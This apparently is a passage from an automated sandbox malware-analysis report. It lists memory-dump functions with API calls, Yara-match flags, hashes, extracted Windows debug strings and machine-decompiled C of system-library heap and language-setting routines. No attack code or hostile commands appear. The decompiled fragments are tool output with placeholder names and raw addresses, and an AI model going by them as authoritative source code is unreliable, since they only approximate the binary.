                    • Opcode ID: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
                    • Instruction ID: 086aab0bc8c344d6c60c9bbd5a0512cabfd8005857d16272e4a7e29987098a06
                    • Opcode Fuzzy Hash: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
                    • Instruction Fuzzy Hash: C1E012B1200208ABDB18EF99CC49EA777ACEF88764F118559BA085B242C630E9108AB0
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 0041A7D0, Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                    Download Yara Rule
                    APIs
                    • LookupPrivilegeValueW.ADVAPI32(00000000,0000003C,0040F1D2,0040F1D2,0000003C,00000000,?,00409D65), ref: 0041A800
                    Memory Dump Source
                    • Source File: 00000003.00000002.436548736.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                    Yara matches
                    Similarity
                    • API ID: LookupPrivilegeValue
                    • String ID:
                    • API String ID: 3899507212-0
                    • Opcode ID: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
                    • Instruction ID: 3f9aab8e47c10174471559fee5d267dc63a882ce56825bdd12c8e63267ac542a
                    • Opcode Fuzzy Hash: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
                    • Instruction Fuzzy Hash: 23E01AB12002086BDB10DF49CC85EE737ADEF88654F118155BA0C57241C934E8118BF5
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 0041A6A2, Relevance: 1.5, APIs: 1, Instructions: 21COMMON
                    Download Yara Rule
                    APIs
                    • ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 0041A6D8
                    Memory Dump Source
                    • Source File: 00000003.00000002.436548736.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                    Yara matches
                    Similarity
                    • API ID: ExitProcess
                    • String ID:
                    • API String ID: 621844428-0
                    • Opcode ID: b4272d3d17b2c5da9343ad5abb696ade9cf068d9a023d03307a117cae4070867
                    • Instruction ID: ab3ca265846676aa369bc085c39992a50e0c52756b469b4d607a6193502350b3
                    • Opcode Fuzzy Hash: b4272d3d17b2c5da9343ad5abb696ade9cf068d9a023d03307a117cae4070867
                    • Instruction Fuzzy Hash: 52E08C762012187BD620DB59CC89FD73BACDB49BA4F0981657A986B283C534EA0086E5
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 0041A6B0, Relevance: 1.5, APIs: 1, Instructions: 20COMMON
                    Download Yara Rule
                    APIs
                    • ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 0041A6D8
                    Memory Dump Source
                    • Source File: 00000003.00000002.436548736.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                    Yara matches
                    Similarity
                    • API ID: ExitProcess
                    • String ID:
                    • API String ID: 621844428-0
                    • Opcode ID: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
                    • Instruction ID: 671013aba82168957284564a3a9f05bc2528e3e40ec9789e05460755300894f7
                    • Opcode Fuzzy Hash: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
                    • Instruction Fuzzy Hash: 68D017726002187BD620EB99CC85FD777ACDF48BA4F1580A9BA1C6B242C531BA108AE1
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 014A967A, Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMON
                    Download Yara Rule
                    APIs
                    Memory Dump Source
                    • Source File: 00000003.00000002.437089403.0000000001440000.00000040.00000001.sdmp, Offset: 01440000, based on PE: true
                    Similarity
                    • API ID: InitializeThunk
                    • String ID:
                    • API String ID: 2994545307-0
                    • Opcode ID: ee3b82205e7a698292b1c1868bc11defed73c9f445cf3b961278753d1408783f
                    • Instruction ID: b24e4ec2db5eeb6de4659ef7ee6c29642be14ac35b2c1c5cfb11921f8c6698f5
                    • Opcode Fuzzy Hash: ee3b82205e7a698292b1c1868bc11defed73c9f445cf3b961278753d1408783f
                    • Instruction Fuzzy Hash: 7EB09B71D014D5C6D651D7A446087177910BBD4745F57C463D1060652B8778D091F5B5
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Non-executed Functions

                    Function 0151B260, Relevance: 37.8, Strings: 30, Instructions: 262COMMON
                    Download Yara Rule
                    Strings
                    • This means that the I/O device reported an I/O error. Check your hardware., xrefs: 0151B476
                    • The stack trace should show the guilty function (the function directly above __report_gsfailure)., xrefs: 0151B323
                    • The critical section is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 0151B3D6
                    • an invalid address, %p, xrefs: 0151B4CF
                    • *** An Access Violation occurred in %ws:%s, xrefs: 0151B48F
                    • *** Critical Section Timeout (%p) in %ws:%s, xrefs: 0151B39B
                    • write to, xrefs: 0151B4A6
                    • This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked., xrefs: 0151B305
                    • *** enter .exr %p for the exception record, xrefs: 0151B4F1
                    • *** enter .cxr %p for the context, xrefs: 0151B50D
                    • This failed because of error %Ix., xrefs: 0151B446
                    • The instruction at %p tried to %s , xrefs: 0151B4B6
                    • *** then kb to get the faulting stack, xrefs: 0151B51C
                    • If this bug ends up in the shipping product, it could be a severe security hole., xrefs: 0151B314
                    • The resource is owned shared by %d threads, xrefs: 0151B37E
                    • a NULL pointer, xrefs: 0151B4E0
                    • This means the data could not be read, typically because of a bad block on the disk. Check your hardware., xrefs: 0151B47D
                    • The critical section is owned by thread %p., xrefs: 0151B3B9
                    • *** Resource timeout (%p) in %ws:%s, xrefs: 0151B352
                    • read from, xrefs: 0151B4AD, 0151B4B2
                    • The resource is owned exclusively by thread %p, xrefs: 0151B374
                    • *** Restarting wait on critsec or resource at %p (in %ws:%s), xrefs: 0151B53F
                    • This means the machine is out of memory. Use !vm to see where all the memory is being used., xrefs: 0151B484
                    • The resource is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 0151B38F
                    • The instruction at %p referenced memory at %p., xrefs: 0151B432
                    • *** A stack buffer overrun occurred in %ws:%s, xrefs: 0151B2F3
                    • <unknown>, xrefs: 0151B27E, 0151B2D1, 0151B350, 0151B399, 0151B417, 0151B48E
                    • Go determine why that thread has not released the critical section., xrefs: 0151B3C5
                    • *** Inpage error in %ws:%s, xrefs: 0151B418
                    • *** Unhandled exception 0x%08lx, hit in %ws:%s, xrefs: 0151B2DC
                    Memory Dump Source
                    • Source File: 00000003.00000002.437089403.0000000001440000.00000040.00000001.sdmp, Offset: 01440000, based on PE: true
                    Similarity
                    • API ID:
                    • String ID: *** A stack buffer overrun occurred in %ws:%s$ *** An Access Violation occurred in %ws:%s$ *** Critical Section Timeout (%p) in %ws:%s$ *** Inpage error in %ws:%s$ *** Resource timeout (%p) in %ws:%s$ *** Unhandled exception 0x%08lx, hit in %ws:%s$ *** enter .cxr %p for the context$ *** Restarting wait on critsec or resource at %p (in %ws:%s)$ *** enter .exr %p for the exception record$ *** then kb to get the faulting stack$<unknown>$Go determine why that thread has not released the critical section.$If this bug ends up in the shipping product, it could be a severe security hole.$The critical section is owned by thread %p.$The critical section is unowned. This usually implies a slow-moving machine due to memory pressure$The instruction at %p referenced memory at %p.$The instruction at %p tried to %s $The resource is owned exclusively by thread %p$The resource is owned shared by %d threads$The resource is unowned. This usually implies a slow-moving machine due to memory pressure$The stack trace should show the guilty function (the function directly above __report_gsfailure).$This failed because of error %Ix.$This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked.$This means that the I/O device reported an I/O error. Check your hardware.$This means the data could not be read, typically because of a bad block on the disk. Check your hardware.$This means the machine is out of memory. Use !vm to see where all the memory is being used.$a NULL pointer$an invalid address, %p$read from$write to
                    • API String ID: 0-108210295
                    • Opcode ID: 002c781ca5e1fb3ef8fcc0d71538c707b2ad71aa47588cd52cd64a73543cf583
                    • Instruction ID: 6ad703d2b69ae4870347fa7633ed0fb25da4a4368ba4f7d5e4290d0b9f870386
                    • Opcode Fuzzy Hash: 002c781ca5e1fb3ef8fcc0d71538c707b2ad71aa47588cd52cd64a73543cf583
                    • Instruction Fuzzy Hash: 34810475A40200FBEB226A4A9C45D6F3F76FF66B51F40404EFA042F236E2B59551CAB2
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 01521C06, Relevance: 31.4, Strings: 25, Instructions: 195COMMON
                    Download Yara Rule
                    C-Code - Quality: 44%
                    			E01521C06() {
				signed int _t27;
				char* _t104;
				char* _t105;
				intOrPtr _t113;
				intOrPtr _t115;
				intOrPtr _t117;
				intOrPtr _t119;
				intOrPtr _t120;

				_t105 = 0x14448a4;
				_t104 = "HEAP: ";
				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
					_push(_t104);
					E0146B150();
				} else {
					E0146B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
				}
				_push( *0x155589c);
				E0146B150("Heap error detected at %p (heap handle %p)\n",  *0x15558a0);
				_t27 =  *0x1555898; // 0x0
				if(_t27 <= 0xf) {
					switch( *((intOrPtr*)(_t27 * 4 +  &M01521E96))) {
						case 0:
							_t105 = "heap_failure_internal";
							goto L21;
						case 1:
							goto L21;
						case 2:
							goto L21;
						case 3:
							goto L21;
						case 4:
							goto L21;
						case 5:
							goto L21;
						case 6:
							goto L21;
						case 7:
							goto L21;
						case 8:
							goto L21;
						case 9:
							goto L21;
						case 0xa:
							goto L21;
						case 0xb:
							goto L21;
						case 0xc:
							goto L21;
						case 0xd:
							goto L21;
						case 0xe:
							goto L21;
						case 0xf:
							goto L21;
					}
				}
				L21:
				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
					_push(_t104);
					E0146B150();
				} else {
					E0146B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
				}
				_push(_t105);
				E0146B150("Error code: %d - %s\n",  *0x1555898);
				_t113 =  *0x15558a4; // 0x0
				if(_t113 != 0) {
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push(_t104);
						E0146B150();
					} else {
						E0146B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					E0146B150("Parameter1: %p\n",  *0x15558a4);
				}
				_t115 =  *0x15558a8; // 0x0
				if(_t115 != 0) {
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push(_t104);
						E0146B150();
					} else {
						E0146B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					E0146B150("Parameter2: %p\n",  *0x15558a8);
				}
				_t117 =  *0x15558ac; // 0x0
				if(_t117 != 0) {
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push(_t104);
						E0146B150();
					} else {
						E0146B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					E0146B150("Parameter3: %p\n",  *0x15558ac);
				}
				_t119 =  *0x15558b0; // 0x0
				if(_t119 != 0) {
					L41:
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push(_t104);
						E0146B150();
					} else {
						E0146B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					_push( *0x15558b4);
					E0146B150("Last known valid blocks: before - %p, after - %p\n",  *0x15558b0);
				} else {
					_t120 =  *0x15558b4; // 0x0
					if(_t120 != 0) {
						goto L41;
					}
				}
				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
					_push(_t104);
					E0146B150();
				} else {
					E0146B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
				}
				return E0146B150("Stack trace available at %p\n", 0x15558c0);
			}











                    0x01521c10
                    0x01521c16
                    0x01521c1e
                    0x01521c3d
                    0x01521c3e
                    0x01521c20
                    0x01521c35
                    0x01521c3a
                    0x01521c44
                    0x01521c55
                    0x01521c5a
                    0x01521c65
                    0x01521c67
                    0x00000000
                    0x01521c6e
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00000000
                    0x01521c67
                    0x01521cdc
                    0x01521ce5
                    0x01521d04
                    0x01521d05
                    0x01521ce7
                    0x01521cfc
                    0x01521d01
                    0x01521d0b
                    0x01521d17
                    0x01521d1f
                    0x01521d25
                    0x01521d30
                    0x01521d4f
                    0x01521d50
                    0x01521d32
                    0x01521d47
                    0x01521d4c
                    0x01521d61
                    0x01521d67
                    0x01521d68
                    0x01521d6e
                    0x01521d79
                    0x01521d98
                    0x01521d99
                    0x01521d7b
                    0x01521d90
                    0x01521d95
                    0x01521daa
                    0x01521db0
                    0x01521db1
                    0x01521db7
                    0x01521dc2
                    0x01521de1
                    0x01521de2
                    0x01521dc4
                    0x01521dd9
                    0x01521dde
                    0x01521df3
                    0x01521df9
                    0x01521dfa
                    0x01521e00
                    0x01521e0a
                    0x01521e13
                    0x01521e32
                    0x01521e33
                    0x01521e15
                    0x01521e2a
                    0x01521e2f
                    0x01521e39
                    0x01521e4a
                    0x01521e02
                    0x01521e02
                    0x01521e08
                    0x00000000
                    0x00000000
                    0x01521e08
                    0x01521e5b
                    0x01521e7a
                    0x01521e7b
                    0x01521e5d
                    0x01521e72
                    0x01521e77
                    0x01521e95

                    Strings
                    Memory Dump Source
                    • Source File: 00000003.00000002.437089403.0000000001440000.00000040.00000001.sdmp, Offset: 01440000, based on PE: true
                    Similarity
                    • API ID:
                    • String ID: Error code: %d - %s$HEAP: $HEAP[%wZ]: $Heap error detected at %p (heap handle %p)$Last known valid blocks: before - %p, after - %p$Parameter1: %p$Parameter2: %p$Parameter3: %p$Stack trace available at %p$heap_failure_block_not_busy$heap_failure_buffer_overrun$heap_failure_buffer_underrun$heap_failure_cross_heap_operation$heap_failure_entry_corruption$heap_failure_freelists_corruption$heap_failure_generic$heap_failure_internal$heap_failure_invalid_allocation_type$heap_failure_invalid_argument$heap_failure_lfh_bitmap_mismatch$heap_failure_listentry_corruption$heap_failure_multiple_entries_corruption$heap_failure_unknown$heap_failure_usage_after_free$heap_failure_virtual_block_corruption
                    • API String ID: 0-2897834094
                    • Opcode ID: 1bec0abeb26a68a107af6bb6100e9e83c8cf9e390108369d393b28d9e9917096
                    • Instruction ID: 8ef2fa56f887678a0a19a78219aadd94f64cb780c374340149289dba064defe1
                    • Opcode Fuzzy Hash: 1bec0abeb26a68a107af6bb6100e9e83c8cf9e390108369d393b28d9e9917096
                    • Instruction Fuzzy Hash: 96613737610955EFD311AB86D4C5D26B7E8FB129B4B1A806FF90DBF3A1D6309C408B1A
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 01473D34, Relevance: 6.7, Strings: 5, Instructions: 435COMMON
                    Download Yara Rule
                    C-Code - Quality: 96%
                    			E01473D34(signed int* __ecx) {
				signed int* _v8;
				char _v12;
				signed int* _v16;
				signed int* _v20;
				char _v24;
				signed int _v28;
				signed int _v32;
				char _v36;
				signed int _v40;
				signed int _v44;
				signed int* _v48;
				signed int* _v52;
				signed int _v56;
				signed int _v60;
				char _v68;
				signed int _t140;
				signed int _t161;
				signed int* _t236;
				signed int* _t242;
				signed int* _t243;
				signed int* _t244;
				signed int* _t245;
				signed int _t255;
				void* _t257;
				signed int _t260;
				void* _t262;
				signed int _t264;
				void* _t267;
				signed int _t275;
				signed int* _t276;
				short* _t277;
				signed int* _t278;
				signed int* _t279;
				signed int* _t280;
				short* _t281;
				signed int* _t282;
				short* _t283;
				signed int* _t284;
				void* _t285;

				_v60 = _v60 | 0xffffffff;
				_t280 = 0;
				_t242 = __ecx;
				_v52 = __ecx;
				_v8 = 0;
				_v20 = 0;
				_v40 = 0;
				_v28 = 0;
				_v32 = 0;
				_v44 = 0;
				_v56 = 0;
				_t275 = 0;
				_v16 = 0;
				if(__ecx == 0) {
					_t280 = 0xc000000d;
					_t140 = 0;
					L50:
					 *_t242 =  *_t242 | 0x00000800;
					_t242[0x13] = _t140;
					_t242[0x16] = _v40;
					_t242[0x18] = _v28;
					_t242[0x14] = _v32;
					_t242[0x17] = _t275;
					_t242[0x15] = _v44;
					_t242[0x11] = _v56;
					_t242[0x12] = _v60;
					return _t280;
				}
				if(E01471B8F(L"WindowsExcludedProcs",  &_v36,  &_v12,  &_v8) >= 0) {
					_v56 = 1;
					if(_v8 != 0) {
						L014877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v8);
					}
					_v8 = _t280;
				}
				if(E01471B8F(L"Kernel-MUI-Number-Allowed",  &_v36,  &_v12,  &_v8) >= 0) {
					_v60 =  *_v8;
					L014877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v8);
					_v8 = _t280;
				}
				if(E01471B8F(L"Kernel-MUI-Language-Allowed",  &_v36,  &_v12,  &_v8) < 0) {
					L16:
					if(E01471B8F(L"Kernel-MUI-Language-Disallowed",  &_v36,  &_v12,  &_v8) < 0) {
						L28:
						if(E01471B8F(L"Kernel-MUI-Language-SKU",  &_v36,  &_v12,  &_v8) < 0) {
							L46:
							_t275 = _v16;
							L47:
							_t161 = 0;
							L48:
							if(_v8 != 0) {
								L014877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t161, _v8);
							}
							_t140 = _v20;
							if(_t140 != 0) {
								if(_t275 != 0) {
									L014877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t275);
									_t275 = 0;
									_v28 = 0;
									_t140 = _v20;
								}
							}
							goto L50;
						}
						_t167 = _v12;
						_t255 = _v12 + 4;
						_v44 = _t255;
						if(_t255 == 0) {
							_t276 = _t280;
							_v32 = _t280;
						} else {
							_t276 = L01484620(_t255,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t255);
							_t167 = _v12;
							_v32 = _t276;
						}
						if(_t276 == 0) {
							_v44 = _t280;
							_t280 = 0xc0000017;
							goto L46;
						} else {
							E014AF3E0(_t276, _v8, _t167);
							_v48 = _t276;
							_t277 = E014B1370(_t276, 0x1444e90);
							_pop(_t257);
							if(_t277 == 0) {
								L38:
								_t170 = _v48;
								if( *_v48 != 0) {
									E014ABB40(0,  &_v68, _t170);
									if(L014743C0( &_v68,  &_v24) != 0) {
										_t280 =  &(_t280[0]);
									}
								}
								if(_t280 == 0) {
									_t280 = 0;
									L014877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v32);
									_v44 = 0;
									_v32 = 0;
								} else {
									_t280 = 0;
								}
								_t174 = _v8;
								if(_v8 != 0) {
									L014877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t174);
								}
								_v8 = _t280;
								goto L46;
							}
							_t243 = _v48;
							do {
								 *_t277 = 0;
								_t278 = _t277 + 2;
								E014ABB40(_t257,  &_v68, _t243);
								if(L014743C0( &_v68,  &_v24) != 0) {
									_t280 =  &(_t280[0]);
								}
								_t243 = _t278;
								_t277 = E014B1370(_t278, 0x1444e90);
								_pop(_t257);
							} while (_t277 != 0);
							_v48 = _t243;
							_t242 = _v52;
							goto L38;
						}
					}
					_t191 = _v12;
					_t260 = _v12 + 4;
					_v28 = _t260;
					if(_t260 == 0) {
						_t275 = _t280;
						_v16 = _t280;
					} else {
						_t275 = L01484620(_t260,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t260);
						_t191 = _v12;
						_v16 = _t275;
					}
					if(_t275 == 0) {
						_v28 = _t280;
						_t280 = 0xc0000017;
						goto L47;
					} else {
						E014AF3E0(_t275, _v8, _t191);
						_t285 = _t285 + 0xc;
						_v48 = _t275;
						_t279 = _t280;
						_t281 = E014B1370(_v16, 0x1444e90);
						_pop(_t262);
						if(_t281 != 0) {
							_t244 = _v48;
							do {
								 *_t281 = 0;
								_t282 = _t281 + 2;
								E014ABB40(_t262,  &_v68, _t244);
								if(L014743C0( &_v68,  &_v24) != 0) {
									_t279 =  &(_t279[0]);
								}
								_t244 = _t282;
								_t281 = E014B1370(_t282, 0x1444e90);
								_pop(_t262);
							} while (_t281 != 0);
							_v48 = _t244;
							_t242 = _v52;
						}
						_t201 = _v48;
						_t280 = 0;
						if( *_v48 != 0) {
							E014ABB40(_t262,  &_v68, _t201);
							if(L014743C0( &_v68,  &_v24) != 0) {
								_t279 =  &(_t279[0]);
							}
						}
						if(_t279 == 0) {
							L014877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v16);
							_v28 = _t280;
							_v16 = _t280;
						}
						_t202 = _v8;
						if(_v8 != 0) {
							L014877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t202);
						}
						_v8 = _t280;
						goto L28;
					}
				}
				_t214 = _v12;
				_t264 = _v12 + 4;
				_v40 = _t264;
				if(_t264 == 0) {
					_v20 = _t280;
				} else {
					_t236 = L01484620(_t264,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t264);
					_t280 = _t236;
					_v20 = _t236;
					_t214 = _v12;
				}
				if(_t280 == 0) {
					_t161 = 0;
					_t280 = 0xc0000017;
					_v40 = 0;
					goto L48;
				} else {
					E014AF3E0(_t280, _v8, _t214);
					_t285 = _t285 + 0xc;
					_v48 = _t280;
					_t283 = E014B1370(_t280, 0x1444e90);
					_pop(_t267);
					if(_t283 != 0) {
						_t245 = _v48;
						do {
							 *_t283 = 0;
							_t284 = _t283 + 2;
							E014ABB40(_t267,  &_v68, _t245);
							if(L014743C0( &_v68,  &_v24) != 0) {
								_t275 = _t275 + 1;
							}
							_t245 = _t284;
							_t283 = E014B1370(_t284, 0x1444e90);
							_pop(_t267);
						} while (_t283 != 0);
						_v48 = _t245;
						_t242 = _v52;
					}
					_t224 = _v48;
					_t280 = 0;
					if( *_v48 != 0) {
						E014ABB40(_t267,  &_v68, _t224);
						if(L014743C0( &_v68,  &_v24) != 0) {
							_t275 = _t275 + 1;
						}
					}
					if(_t275 == 0) {
						L014877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v20);
						_v40 = _t280;
						_v20 = _t280;
					}
					_t225 = _v8;
					if(_v8 != 0) {
						L014877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t225);
					}
					_v8 = _t280;
					goto L16;
				}
			}










































                    0x01473d3c
                    0x01473d42
                    0x01473d44
                    0x01473d46
                    0x01473d49
                    0x01473d4c
                    0x01473d4f
                    0x01473d52
                    0x01473d55
                    0x01473d58
                    0x01473d5b
                    0x01473d5f
                    0x01473d61
                    0x01473d66
                    0x014c8213
                    0x014c8218
                    0x01474085
                    0x01474088
                    0x0147408e
                    0x01474094
                    0x0147409a
                    0x014740a0
                    0x014740a6
                    0x014740a9
                    0x014740af
                    0x014740b6
                    0x014740bd
                    0x014740bd
                    0x01473d83
                    0x014c821f
                    0x014c8229
                    0x014c8238
                    0x014c8238
                    0x014c823d
                    0x014c823d
                    0x01473da0
                    0x01473daf
                    0x01473db5
                    0x01473dba
                    0x01473dba
                    0x01473dd4
                    0x01473e94
                    0x01473eab
                    0x01473f6d
                    0x01473f84
                    0x0147406b
                    0x0147406b
                    0x0147406e
                    0x0147406e
                    0x01474070
                    0x01474074
                    0x014c8351
                    0x014c8351
                    0x0147407a
                    0x0147407f
                    0x014c835d
                    0x014c8370
                    0x014c8377
                    0x014c8379
                    0x014c837c
                    0x014c837c
                    0x014c835d
                    0x00000000
                    0x0147407f
                    0x01473f8a
                    0x01473f8d
                    0x01473f90
                    0x01473f95
                    0x014c830d
                    0x014c830f
                    0x01473f9b
                    0x01473fac
                    0x01473fae
                    0x01473fb1
                    0x01473fb1
                    0x01473fb6
                    0x014c8317
                    0x014c831a
                    0x00000000
                    0x01473fbc
                    0x01473fc1
                    0x01473fc9
                    0x01473fd7
                    0x01473fda
                    0x01473fdd
                    0x01474021
                    0x01474021
                    0x01474029
                    0x01474030
                    0x01474044
                    0x01474046
                    0x01474046
                    0x01474044
                    0x01474049
                    0x014c8327
                    0x014c8334
                    0x014c8339
                    0x014c833c
                    0x0147404f
                    0x0147404f
                    0x0147404f
                    0x01474051
                    0x01474056
                    0x01474063
                    0x01474063
                    0x01474068
                    0x00000000
                    0x01474068
                    0x01473fdf
                    0x01473fe2
                    0x01473fe4
                    0x01473fe7
                    0x01473fef
                    0x01474003
                    0x01474005
                    0x01474005
                    0x0147400c
                    0x01474013
                    0x01474016
                    0x01474017
                    0x0147401b
                    0x0147401e
                    0x00000000
                    0x0147401e
                    0x01473fb6
                    0x01473eb1
                    0x01473eb4
                    0x01473eb7
                    0x01473ebc
                    0x014c82a9
                    0x014c82ab
                    0x01473ec2
                    0x01473ed3
                    0x01473ed5
                    0x01473ed8
                    0x01473ed8
                    0x01473edd
                    0x014c82b3
                    0x014c82b6
                    0x00000000
                    0x01473ee3
                    0x01473ee8
                    0x01473eed
                    0x01473ef0
                    0x01473ef3
                    0x01473f02
                    0x01473f05
                    0x01473f08
                    0x014c82c0
                    0x014c82c3
                    0x014c82c5
                    0x014c82c8
                    0x014c82d0
                    0x014c82e4
                    0x014c82e6
                    0x014c82e6
                    0x014c82ed
                    0x014c82f4
                    0x014c82f7
                    0x014c82f8
                    0x014c82fc
                    0x014c82ff
                    0x014c82ff
                    0x01473f0e
                    0x01473f11
                    0x01473f16
                    0x01473f1d
                    0x01473f31
                    0x014c8307
                    0x014c8307
                    0x01473f31
                    0x01473f39
                    0x01473f48
                    0x01473f4d
                    0x01473f50
                    0x01473f50
                    0x01473f53
                    0x01473f58
                    0x01473f65
                    0x01473f65
                    0x01473f6a
                    0x00000000
                    0x01473f6a
                    0x01473edd
                    0x01473dda
                    0x01473ddd
                    0x01473de0
                    0x01473de5
                    0x014c8245
                    0x01473deb
                    0x01473df7
                    0x01473dfc
                    0x01473dfe
                    0x01473e01
                    0x01473e01
                    0x01473e06
                    0x014c824d
                    0x014c824f
                    0x014c8254
                    0x00000000
                    0x01473e0c
                    0x01473e11
                    0x01473e16
                    0x01473e19
                    0x01473e29
                    0x01473e2c
                    0x01473e2f
                    0x014c825c
                    0x014c825f
                    0x014c8261
                    0x014c8264
                    0x014c826c
                    0x014c8280
                    0x014c8282
                    0x014c8282
                    0x014c8289
                    0x014c8290
                    0x014c8293
                    0x014c8294
                    0x014c8298
                    0x014c829b
                    0x014c829b
                    0x01473e35
                    0x01473e38
                    0x01473e3d
                    0x01473e44
                    0x01473e58
                    0x014c82a3
                    0x014c82a3
                    0x01473e58
                    0x01473e60
                    0x01473e6f
                    0x01473e74
                    0x01473e77
                    0x01473e77
                    0x01473e7a
                    0x01473e7f
                    0x01473e8c
                    0x01473e8c
                    0x01473e91
                    0x00000000
                    0x01473e91

                    Strings
                    • Kernel-MUI-Language-Allowed, xrefs: 01473DC0
                    • WindowsExcludedProcs, xrefs: 01473D6F
                    • Kernel-MUI-Language-SKU, xrefs: 01473F70
                    • Kernel-MUI-Number-Allowed, xrefs: 01473D8C
                    • Kernel-MUI-Language-Disallowed, xrefs: 01473E97
                    Memory Dump Source
                    • Source File: 00000003.00000002.437089403.0000000001440000.00000040.00000001.sdmp, Offset: 01440000, based on PE: true
                    Similarity
                    • API ID:
                    • String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs
                    • API String ID: 0-258546922
                    • Opcode ID: 0285780bbe233b2bf32356d1a5d6c1f2652b03be31b0d78e8f41f479ebfade01
                    • Instruction ID: 52b3431a44a9ef103bd353e6f4c52dafea104e7bb0dfe440abb2abc1e54f851c
                    • Opcode Fuzzy Hash: 0285780bbe233b2bf32356d1a5d6c1f2652b03be31b0d78e8f41f479ebfade01
                    • Instruction Fuzzy Hash: 75F14F76D00619EFDB11DF99C980AEFBBB9FF58A50F15005BE905A7260E7349E01CBA0
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 014640E1, Relevance: 6.3, Strings: 5, Instructions: 51COMMON
                    Download Yara Rule
                    C-Code - Quality: 29%
                    			E014640E1(void* __edx) {
				void* _t19;
				void* _t29;

				_t28 = _t19;
				_t29 = __edx;
				if( *((intOrPtr*)(_t19 + 0x60)) != 0xeeffeeff) {
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push("HEAP: ");
						E0146B150();
					} else {
						E0146B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					E0146B150("Invalid heap signature for heap at %p", _t28);
					if(_t29 != 0) {
						E0146B150(", passed to %s", _t29);
					}
					_push("\n");
					E0146B150();
					if( *((char*)( *[fs:0x30] + 2)) != 0) {
						 *0x1556378 = 1;
						asm("int3");
						 *0x1556378 = 0;
					}
					return 0;
				}
				return 1;
			}





                    0x014640e6
                    0x014640e8
                    0x014640f1
                    0x014c042d
                    0x014c044c
                    0x014c0451
                    0x014c042f
                    0x014c0444
                    0x014c0449
                    0x014c045d
                    0x014c0466
                    0x014c046e
                    0x014c0474
                    0x014c0475
                    0x014c047a
                    0x014c048a
                    0x014c048c
                    0x014c0493
                    0x014c0494
